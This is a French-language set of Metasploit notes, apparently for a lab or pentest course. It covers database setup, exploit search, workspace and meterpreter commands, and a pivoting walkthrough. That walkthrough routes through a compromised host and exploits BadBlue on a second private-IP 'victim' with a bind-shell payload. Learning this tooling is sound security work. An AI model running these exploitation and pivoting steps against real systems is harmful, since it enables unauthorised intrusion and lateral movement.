Lancement
sudo systemctl start postgresql
# 1er lancement
sudo msfdb init
sudo msfdb status
#
msfconsole
Recherche
msf> search cve:2017 type:exploit platform:windows
Workspace
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run msf> workspace -h
msf> db_status
msf> workspace -a <new-workspace>
msf> db_import <my-nmap-scan-file.xml>
msf>hosts
msf>services
msf>vulns
msf>creds
msf> db_nmap -Pn -A <IP>
Routing / Pivoting
meterpreter> run autoroute -s <ip>
# victim1 10.0.23.180 | victim2 10.0.27.99
meterpreter>run autoroute -s 10.0.23.0/20 #session sur victim1 sert de route pour victim2
msf> use auxiliary/scanner/portscan/tcp #scan de port de victim2 depuis victim1
meterpreter>portfwd add -l 1234 -p 80 -r 10.0.27.99 #retour sur session victim1 pour pouvoir faire un nmap sur port 80
msf> nmap -p1234 localhost -sV -sS #scan du port 80 de la victim2
msf> use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS 10.0.27.99
exploit
#bind shell car victim2 ne peux pas nous joindre pour un reverseshell
ENUMERATION
Ports enumeration (TCP)
msf> use auxiliary/scanner/portscan/tcp